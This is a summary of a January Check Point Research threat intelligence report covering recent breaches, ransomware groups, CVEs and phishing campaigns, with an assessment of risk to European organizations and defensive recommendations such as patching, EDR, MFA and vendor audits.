The 12th January Threat Intelligence Report from Check Point Research provides a comprehensive overview of recent cyber threats and vulnerabilities affecting diverse sectors worldwide. Among the most notable incidents is a cyberattack on Manage My Health, New Zealand’s largest patient portal, which potentially exposed sensitive data of approximately 110,000 users. The attacker, known as Kazu, demanded a ransom, indicating a financially motivated threat actor. In Europe, France’s Office for Immigration and Integration suffered a data breach through a third-party operator, resulting in exposure of personal data of foreign residents, including names, contact details, and immigration information. Ledger, a global crypto hardware wallet manufacturer, disclosed a breach at its e-commerce partner Global-e, leading to phishing campaigns targeting customers to harvest wallet credentials, though wallet seed phrases remained secure. The report also details ransomware attacks by groups such as Clop, Medusa, and LockBit 5.0, which employ advanced encryption algorithms (ChaCha20-Poly1305), key exchange mechanisms (X25519 with BLAKE2b), and tactics like termination of backup services and data exfiltration to maximize impact. Vulnerabilities include a critical pre-auth remote code execution flaw in SmarterTools (CVE-2025-52691) with a CVSS score of 10.0, a code injection vulnerability in Open WebUI (CVE-2025-64496), and a medium-severity flaw in Cisco Identity Services Engine (CVE-2026-20029) requiring admin credentials. The report also highlights active botnet campaigns like GoBruteforcer targeting Linux servers via brute force attacks and social engineering scams such as OPCOPRO “Truman Show” exploiting WhatsApp and Telegram for identity theft. European organizations are targeted by PHALT#BLYX, a phishing campaign impersonating Booking.com to steal credentials and escalate privileges via PowerShell execution. Check Point’s IPS, Threat Emulation, and Harmony Endpoint products provide protection against many of these threats, emphasizing the need for layered security. Overall, the report underscores the evolving threat landscape combining ransomware, data breaches, phishing, and exploitation of software vulnerabilities.

European organizations face significant risks from these threats, particularly those in sectors handling sensitive personal data such as immigration offices, healthcare, and financial services. The breach of France’s immigration office highlights the vulnerability of government-related third-party providers, potentially compromising the privacy of foreign residents and impacting trust in public institutions. The Ledger-related phishing campaigns pose a risk to European cryptocurrency users, increasing the likelihood of financial fraud and identity theft. The PHALT#BLYX campaign specifically targets European hospitality businesses, threatening credential theft and unauthorized access, which could disrupt operations and lead to data loss. Ransomware groups like Clop and LockBit 5.0, known to target large organizations, could cause operational downtime, financial losses, and reputational damage if they expand their activities in Europe. Vulnerabilities in widely used software such as Cisco Identity Services Engine and SmarterTools could be exploited to gain unauthorized access or execute remote code, potentially leading to full system compromise. The presence of botnets like GoBruteforcer targeting Linux servers increases the risk of credential theft and lateral movement within networks. Overall, these threats could undermine data confidentiality, integrity, and availability, affecting compliance with GDPR and other regulations, and causing significant operational and financial impacts.

European organizations should implement a multi-layered defense strategy tailored to the specific threats outlined. For vulnerabilities like CVE-2025-52691 in SmarterTools and CVE-2025-64496 in Open WebUI, immediate patching or upgrading to fixed versions is critical to prevent remote code execution. Organizations using Cisco Identity Services Engine should enforce strict administrative access controls and monitor for suspicious activity due to the requirement of valid credentials for exploitation. To counter ransomware threats, deploy advanced endpoint detection and response (EDR) solutions with behavioral analysis capabilities, such as Check Point Harmony Endpoint and Threat Emulation, to detect and block ransomware execution and lateral movement. Enhance phishing defenses by training employees to recognize sophisticated social engineering tactics like those used in PHALT#BLYX and Ledger-related scams, and implement email filtering and multi-factor authentication (MFA) to reduce credential compromise risks. Regularly audit third-party vendors and enforce stringent data protection agreements to mitigate risks from supply chain breaches, as seen in the France immigration office incident. Employ network segmentation and strict access controls to limit the spread of botnets like GoBruteforcer and monitor for brute force attempts on critical services. Finally, maintain comprehensive incident response plans and conduct regular tabletop exercises to ensure readiness against ransomware and data breach scenarios.